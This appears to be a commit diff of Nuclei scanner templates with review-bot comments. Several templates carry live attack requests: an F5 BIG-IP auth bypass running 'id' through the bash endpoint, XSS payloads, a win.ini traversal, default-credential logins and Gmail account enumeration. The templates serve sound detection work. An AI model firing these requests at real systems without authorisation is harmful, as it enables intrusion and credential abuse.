# Enhanced by mp on 2022/05/05


@ -1,10 +1,10 @@
id: CVE-2021-22986
info:
name: F5 BIG-IP iControl REST Unauthenticated Remote Command Execution
name: F5 BIG-IP iControl REST - Remote Command Execution
author: rootxharsh,iamnoooob
severity: critical
description: The F5 BIG-IP iControl REST interface has an unauthenticated remote command execution vulnerability.
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
reference:
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
- https://support.f5.com/csp/article/K03009991
@ -24,7 +24,7 @@ requests:
Authorization: Basic YWRtaW46
Content-Type: application/json
Cookie: BIGIPAuthCookie=1234
Connection: close
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
- |
POST /mgmt/tm/util/bash HTTP/1.1
@ -32,8 +32,9 @@ requests:
Accept-Language: en
X-F5-Auth-Token: {{token}}
Content-Type: application/json
Connection: close
{"command":"run","utilCmdArgs":"-c id"}
extractors:
- type: regex
part: body
@ -42,6 +43,7 @@ requests:
group: 1
regex:
- "([A-Z0-9]{26})"
- type: regex
part: body
group: 1
@ -55,4 +57,4 @@ requests:
- "uid="
condition: and
# Enhanced by mp on 2022/04/13
# Enhanced by mp on 2022/05/05


@ -1,13 +1,11 @@
id: CVE-2021-24285
info:
name: Car Seller - Auto Classifieds Script WordPress plugin SQLI
name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
author: ShreyaPohekar
severity: critical
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate
or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
description: "The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
classification:
@ -36,3 +34,5 @@ requests:
words:
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
part: body
# Enhanced by mp on 2022/05/05


@ -1,13 +1,13 @@
id: CVE-2021-24472
info:
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Unauthenticated RFI and SSRF
name: Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery
author: Suman_Kar
severity: critical
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this
would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
description: Onair2 < 3.9.9.2 and KenthaRadio < 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.
reference:
- https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/05


@ -2,7 +2,7 @@ id: CVE-2021-27358
info:
name: Grafana Unauthenticated Snapshot Creation
author: pdteam
author: pdteam,bing0o
severity: high
description: Grafana 6.7.3 through 7.4.1 snapshot functionality can allow an unauthenticated remote attacker to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
reference:
@ -13,6 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2021-27358
cwe-id: CWE-306
tags: cve,cve2021,grafana,unauth
requests:
@ -20,7 +21,6 @@ requests:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}


@ -7,12 +7,11 @@ info:
description: A directory traversal vulnerability in Ivanti Avalanche allows remote unauthenticated user to access files that reside outside the 'image' folder
reference:
- https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
tags: cve,cve2021,avalanche,traversal
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-30497
cwe-id: CWE-22
tags: cve,cve2021,avalanche,traversal
requests:
- method: GET


@ -0,0 +1,43 @@
id: CVE-2021-37416
info:
name: Zoho ManageEngine ADSelfService Plus - Reflected XSS
author: edoardottt
severity: medium
description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-37416
cwe-id: CWE-79
metadata:
shodan-query: http.title:"ManageEngine"
verified: true
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-37416
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416
- https://blog.stmcyber.com/vulns/cve-2021-37416/
tags: cve,cve2021,zoho,xss
requests:
- method: GET
path:
- "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "></iframe><script>alert(1)</script>"
- "adsf/js/"
condition: and
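Review bot: This new template does not follow the naming and key-ordering scheme the rest of this commit applies: the title on L1515 uses the `Reflected XSS` form the commit is replacing elsewhere (L1040, L928), and `classification` (L1519) precedes `reference` (L1527) whereas the other templates here list references first (L1021–L1026). Suggested title: `name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting`, with the `reference` block moved above `classification`. The matchers themselves look sound: requiring both the reflected payload and the `adsf/js/` marker under `condition: and`, plus a `text/html` content type, limits false positives from generic reflections.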


@ -8,12 +8,12 @@ info:
remediation: Fixed in version 2.7.12
reference:
- https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42
tags: cve,cve2022,wordpress,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-0288
cwe-id: CWE-79
tags: cve,cve2022,wordpress,xss
requests:
- method: POST


@ -0,0 +1,36 @@
id: CVE-2022-0540
info:
name: Atlassian Jira - Authentication bypass in Seraph
author: DhiyaneshDK
severity: critical
description: |
A vulnerability in Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
reference:
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2022,atlassian,jira,exposure,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-0540
cwe-id: CWE-287
requests:
- method: GET
path:
- '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'General Insight Configuration'
- type: status
status:
- 200
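Review bot: The description lists the fixed versions but the template has no `remediation:` field, so consumers reading the metadata cannot surface the fix; add `remediation: Upgrade Jira Server/Data Center to 8.13.18, 8.20.6 or 8.22.0 (Jira Service Management 4.13.18, 4.20.6 or 4.22.0) or later.` The `tags` line also carries `exposure`, which the other auth-bypass template in this commit (CVE-2022-1040) does not use; dropping it keeps tag-based filtering (`-tags auth-bypass`) consistent across the two.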


@ -0,0 +1,45 @@
id: CVE-2022-1040
info:
name: Sophos Firewall - RCE
author: For3stCo1d
severity: critical
description: |
An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older.
reference:
- https://github.com/killvxk/CVE-2022-1040
- https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker
- https://nvd.nist.gov/vuln/detail/CVE-2022-1040
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 9.8
cve-id: CVE-2022-1040
cwe-id: CWE-287
metadata:
verified: true
shodan-query: http.title:"Sophos"
tags: cve,cve2022,sophos,firewall,auth-bypass
requests:
- method: POST
path:
- "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}"
headers:
X-Requested-With: "XMLHttpRequest"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"status\":\"Session Expired\"}"
- type: word
part: header
words:
- "Server: xxxx"
- type: status
status:
- 200
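Review bot: `cvss-metrics` and `cvss-score` disagree: the vector `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` scores 7.5 (CVE-2021-30497 earlier in this commit carries exactly that vector with 7.50), while 9.8 corresponds to `C:H/I:H/A:H` as on CVE-2022-0540. Since the name and description call this unauthenticated RCE, the vector looks like the wrong half; change it to `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` after confirming against the NVD entry already listed in `reference`.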


@ -0,0 +1,49 @@
id: CVE-2022-1388
info:
name: F5 BIG-IP iControl REST Auth Bypass RCE
author: dwisiswant0
severity: critical
description: |
This vulnerability may allow an unauthenticated attacker
with network access to the BIG-IP system through the management
port and/or self IP addresses to execute arbitrary system commands,
create or delete files, or disable services. There is no data plane
exposure; this is a control plane issue only.
reference:
- https://twitter.com/GossiTheDog/status/1523566937414193153
- https://support.f5.com/csp/article/K23605346
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-1388
cwe-id: CWE-306
metadata:
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
verified: true
tags: bigip,cve,cve2022,rce,mirai
variables:
auth: "admin:"
requests:
- raw:
- |
POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: a
Authorization: Basic {{base64(auth)}}
Content-Type: application/json
{
"command": "run",
"utilCmdArgs": "-c id"
}
matchers:
- type: word
words:
- "commandResult"
- "uid="
condition: and
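Review bot: This template goes beyond detection — the raw request runs `id` through `/mgmt/tm/util/bash` and matches on its output — but nothing in `info` tells a user that. Add a sentence to `description` such as `This template executes a harmless command (id) on the target to confirm the bypass.` and, if the repository's `intrusive` tag convention applies, add it to `tags` so the template can be excluded with `-etags intrusive`. The `reference` list could also carry the NVD entry like the other CVE templates in this commit.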


@ -0,0 +1,33 @@
id: CVE-2022-1439
info:
name: Microweber Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: Reflected XSS in microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1439
- https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/
classification:
cve-id: CVE-2022-1439
metadata:
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss
requests:
- method: GET
path:
- '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<div class='x module module-'onmouseover=alert(document.domain) '"
- "parent-module-id"
condition: and
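Review bot: The `description` is pasted from the bounty report in first person ("It's the only payload I found working ... paylaod") and does not read as template documentation; replace it with `description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability that allows arbitrary JavaScript to run in the context of the attacked user.` The `classification` block also lacks `cwe-id: CWE-79` and the CVSS vector/score that the other reflected-XSS templates in this commit (CVE-2021-37416, CVE-2022-29548) carry; add them from the NVD link already in `reference`.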


@ -0,0 +1,32 @@
id: CVE-2022-26233
info:
name: Barco Control Room Management Suite - Directory Traversal
author: 0x_Akoko
severity: high
description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
reference:
- https://0day.today/exploit/37579
- https://www.cvedetails.com/cve/CVE-2022-26233
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
tags: cve,cve2022,barco,lfi
requests:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
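Review bot: The body words `fonts` and `extensions` are ordinary English words, so with only `bit app support` pinning the match, a generic page mentioning both could satisfy `condition: and`; use the section headers as they appear in the file (`- "[fonts]"` and `- "[extensions]"`) to tighten it. The `|+` chomping indicator is correct here because the raw request needs its trailing blank line to terminate the headers, but a one-line comment above `unsafe: true` explaining that the backslash path must be sent verbatim would save the next reader a lookup.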


@ -8,6 +8,8 @@ info:
reference:
- https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
- https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
classification:
cve-id: CVE-2022-26352
tags: cve,cve2022,rce,dotcms
requests:
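Review bot: The added `classification` carries only `cve-id`; the other CVE templates touched in this commit (e.g. CVE-2022-1040) also record `cvss-metrics`, `cvss-score` and `cwe-id`, which is where consumers filtering by score will look for them. Please fill in the vector, score and CWE from the NVD entry for CVE-2022-26352. The `info` block this hunk sits in starts outside the hunk.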


@ -0,0 +1,41 @@
id: CVE-2022-29548
info:
name: WSO2 Management Console - Reflected XSS
author: edoardottt
severity: medium
description: |
A reflected XSS issue exists in the Management Console of several WSO2 products.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-29548
cwe-id: CWE-79
metadata:
verified: true
google-dork: inurl:"carbon/admin/login"
tags: cve,cve2022,wso2,xss
requests:
- method: GET
path:
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
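Review bot: The `description` says only that "several WSO2 products" are affected, which leaves whoever triages the finding without the product and version list; expand it from the NVD entry in `reference` to name the affected products and fixed versions, and add a matching `remediation:` line. The `???` in the body word is presumably the Carbon missing-resource-key rendering around the reflected `errorCode` value — a comment above `words:` saying so would keep a future maintainer from "fixing" it.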


@ -0,0 +1,36 @@
id: panabit-ixcache-default-login
info:
name: Panabit iXCache Default Login
author: ritikchaddha
severity: high
reference:
- http://forum.panabit.com/thread-10830-1-1.html
tags: ixcache,default-login,panabit
requests:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
username={{username}}&password={{password}}
payloads:
username:
- admin
password:
- ixcache
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- "URL=/cgi-bin/monitor.cgi"
- type: status
status:
- 200
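Review bot: The raw POST carries a form body but no `Content-Type: application/x-www-form-urlencoded` header, so whether `userverify.cgi` parses `username`/`password` depends on the CGI tolerating a missing type; add the header on the line after `Host: {{Hostname}}`. The same omission is in `telecom-gateway-default-login` later in this commit. `info` also lacks a `description:` — one sentence naming the product and stating that default credentials are tested would match the other default-login templates (see `panabit-default-login`).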


@ -0,0 +1,37 @@
id: telecom-gateway-default-login
info:
name: Telecom Gateway Default Login
author: ritikchaddha
severity: high
tags: telecom,default-login,gateway
requests:
- raw:
- |
POST /manager/login.php HTTP/1.1
Host: {{Hostname}}
Name={{username}}&Pass={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>电信网关服务器管理后台</title>"
- "index-shang.php"
- "di.php"
condition: and
- type: status
status:
- 200
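Review bot: The template has no `description`, `reference` or `metadata`, and the name "Telecom Gateway" is too generic to tell a user which product was tested — the only identifying signal is the matched title `电信网关服务器管理后台`. Add `description: Telecom gateway server management backend (电信网关服务器管理后台) default credentials were discovered.` and a `fofa-query`/`shodan-query` under `metadata:` if one is known. `redirects: true` with `max-redirects: 2` means the title match is evaluated on the post-login page, which is fine but deserves a one-line comment so nobody removes it.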


@ -2,16 +2,19 @@ id: panabit-default-login
info:
name: Panabit Gateway Default Login
author: pikpikcu
author: pikpikcu,ritikchaddha
severity: high
description: Panabit Gateway default credentials were discovered.
reference:
- https://max.book118.com/html/2017/0623/117514590.shtm
- https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
- https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cwe-id: CWE-522
metadata:
fofa-query: app="Panabit-智能网关"
tags: panabit,default-login
requests:
@ -26,31 +29,36 @@ requests:
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="{{username}}"
Content-Disposition: form-data; name="username"
admin
{{username}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="{{password}}"
Content-Disposition: form-data; name="password"
panabit
{{password}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
payloads:
username:
- username
- admin
password:
- password
- panabit
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
part: body
condition: and
- type: word
part: header
words:
- "paonline_admin"
- type: status
status:
- 200


@ -0,0 +1,31 @@
id: bigip-icontrol-rest
info:
name: F5 BIG-IP iControl REST Panel
author: MrCl0wnLab
severity: info
description: |
Undisclosed requests may bypass iControl REST authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
metadata:
shodan-query: http.title:"BIG-IP&reg;-+Redirect" +"Server"
tags: panel,bigip,f5
requests:
- method: GET
path:
- "{{BaseURL}}/mgmt/shared/authn/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "resterrorresponse"
- type: status
status:
- 401
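Review bot: The `description` ("Undisclosed requests may bypass iControl REST authentication.") is the CVE-2022-1388 summary, not a description of what this `severity: info` panel template detects; a panel template should describe the endpoint, e.g. `description: Detects an exposed F5 BIG-IP iControl REST login endpoint (/mgmt/shared/authn/login). See the CVE-2022-1388 references for the associated authentication bypass.` Matching `resterrorresponse` together with `status: 401` is a sound fingerprint of the REST API's own error format, so a one-line comment above `matchers:` stating that is enough.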


@ -6,6 +6,8 @@ info:
severity: info
reference:
- https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
metadata:
shodan-query: http.component:"Adobe ColdFusion"
tags: panel,coldfusion,adobe
requests:


@ -0,0 +1,27 @@
id: rg-uac-panel
info:
name: RG-UAC Ruijie Login Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Get_Verify_Info"
tags: panel,ruijie,router,firewall
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "dkey_check.php"
- "get_dkey_passwd"
condition: and
- type: status
status:
- 200
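Review bot: `info` has no `description` or `reference`, so the finding carries nothing beyond its name; add `description: Ruijie RG-UAC management login panel was detected.` and a vendor link if one is available. Both body words (`dkey_check.php`, `get_dkey_passwd`) are combined with `condition: and`, which is good for precision — a comment above `words:` noting that both are required on purpose would stop someone loosening it.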


@ -0,0 +1,28 @@
id: auto-usb-install
info:
name: Auto USB Installation Enabled
author: pussycat0x
severity: info
description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set auto-install-config disable"
- "set auto-install-image disable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
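Review bot: The negative matcher uses the default `or` condition, so it fires only when neither `set auto-install-config disable` nor `set auto-install-image disable` is present; a config that disables just one of the two — the case "Auto USB Installation Enabled" is meant to catch — is silently passed. Add `condition: and` to the first matcher so the negation reports a finding whenever either line is missing. The same `or`-under-`negative: true` pattern appears in `heuristic-scan` (`config antivirus heuristic` / `set mode block`). Across all the FortiGate audit templates in this commit `reference:` is a plain scalar while every other template uses a list; switching to `reference:` followed by `- https://...` keeps the schema uniform.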


@ -0,0 +1,28 @@
id: heuristic-scan
info:
name: Heuristic scanning is not configured
author: pussycat0x
severity: info
description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "config antivirus heuristic"
- "set mode block"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
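Review bot: `set mode block` is not tied to the `config antivirus heuristic` stanza, so with `negative: true` a `set mode block` anywhere else in the file suppresses the finding while heuristic scanning may still be set to pass or disable; prefer a stanza-qualified `regex` matcher such as `(?s)config antivirus heuristic\s+set mode block` (presuming `set mode` is the stanza's only line, as it appears in config dumps — confirm) and keep `negative: true`. The default `or` condition on this matcher has the weakness noted on `auto-usb-install`. The description is also a manual paragraph; trim it to what the finding means, e.g. `description: Heuristic antivirus scanning is not set to block, so previously unknown malware in binary files is not stopped.`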


@ -0,0 +1,27 @@
id: inactivity-timeout
info:
name: Inactivity Timeout Not Implemented
author: pussycat0x
severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-console-timeout"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
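Review bot: The check only tests for the presence of the `set admin-console-timeout` line, so a config that sets it to an excessively long value still passes, and the name "Not Implemented" promises more than that; say so in the description and consider a `regex` matcher that accepts only values within the intended threshold. As I read the referenced hardening guide, the idle timeout for administrative sessions is `set admintimeout` under `config system global`, with `admin-console-timeout` being a separate console setting — worth confirming which one this check is meant to audit. The sentence `Lack of Inactivity Timeout gives the unauthorized user to act within that threshold...` is also reused verbatim in `remote-auth-timeout`, where it does not describe that setting.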


@ -0,0 +1,27 @@
id: maintainer-account
info:
name: Maintainer Account Not Implemented
author: pussycat0x
severity: info
description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-maintainer"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
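Review bot: The name "Maintainer Account Not Implemented" and the matcher (finding when `set admin-maintainer` is absent) do not agree with the referenced hardening page as I read it, where the maintainer account is enabled by default and the guidance is to disable it (`set admin-maintainer disable`) when physical console access cannot be controlled; absence of the line therefore means the account is still enabled, which is what the finding should say. Rename to something like `Maintainer Account Enabled` and rewrite the description, currently a fragment ending in a stray double period: `description: The maintainer account, which allows password recovery via physical console access, has not been explicitly disabled (set admin-maintainer disable).` Please confirm the default against the linked document before changing the wording.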


@ -0,0 +1,27 @@
id: password-policy
info:
name: Password Policy not Set
author: pussycat0x
severity: info
description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "config system password-policy"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
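Review bot: Presence of a `config system password-policy` stanza does not mean the policy is active — it is the `set status enable` line inside it that turns it on, and a dump can contain the stanza with `set status disable`; match on the enabling line with a `regex` matcher such as `config system password-policy\s+set status enable` (the status line is the first in that stanza in the dumps I have seen — confirm) rather than on the stanza header. The single-string word list means `negative: true` with the default `or` is fine here. Please verify the exact key against the referenced hardening guide.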


@ -0,0 +1,27 @@
id: remote-auth-timeout
info:
name: Remote Authentication timeout not set
author: pussycat0x
severity: info
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set remoteauthtimeout"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
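Review bot: The `description` is copied verbatim from `inactivity-timeout` and talks about an administrator leaving the computer, which has nothing to do with `remoteauthtimeout` (the wait for a reply from a remote RADIUS/LDAP/TACACS+ server, as far as I know); replace it with `description: The remote authentication timeout (set remoteauthtimeout) is not explicitly configured, so the FortiOS default applies to RADIUS/LDAP/TACACS+ lookups.` Note also, for every FortiGate audit template in this commit, that a plain `show` dump omits settings left at their default, so an absent line means "default in effect" rather than "not set"; these presence checks should be documented as expecting `show full-configuration` output.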


@ -0,0 +1,27 @@
id: scp-admin
info:
name: Admin-SCP Disabled
author: pussycat0x
severity: info
description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set admin-scp enable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
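Review bot: Name, matcher and description contradict each other: the matcher reports a finding when `set admin-scp enable` is absent (SCP disabled, which the description's first sentence suggests is the default), the name announces that state as `Admin-SCP Disabled`, and the description then recommends disabling SCP — so the template flags the recommended configuration. Decide which state is the misconfiguration; if SCP being enabled is the exposure, drop `negative: true`, rename to `Admin-SCP Enabled` and use `description: SCP is enabled for administrative access (set admin-scp enable), allowing the configuration file to be downloaded over SCP; the hardening guide recommends leaving it disabled.`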


@ -0,0 +1,27 @@
id: strong-ciphers
info:
name: HTTPS/SSH Strong Ciphers Not Enabled
author: pussycat0x
severity: info
description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
tags: fortigate,config,audit,firewall
file:
- extensions:
- conf
matchers-condition: and
matchers:
- type: word
words:
- "set strong-crypto enable"
negative: true
- type: word
words:
- "config system"
- "config router"
- "config firewall"
condition: or
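Review bot: The description's "can perform attacks like Blowfish" names a cipher, not an attack, and will confuse readers; replace it with `description: Strong cryptography is not enforced for HTTPS/SSH administrative access (set strong-crypto enable), so weak ciphers and MACs may be negotiated with an on-path attacker.` A comment above `words:` noting that the setting lives under `config system global` (confirm against the referenced guide) would also help anyone checking the dump by hand.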


@ -0,0 +1,20 @@
id: valid-gmail-checker
info:
name: Valid Google Mail Checker
author: dievus,dwisiswant0
severity: info
reference:
- https://github.com/dievus/geeMailUserFinder
self-contained: true
requests:
- method: HEAD
path:
- "https://mail.google.com/mail/gxlu?email={{email}}"
matchers:
- type: word
part: header
words:
- "COMPASS"
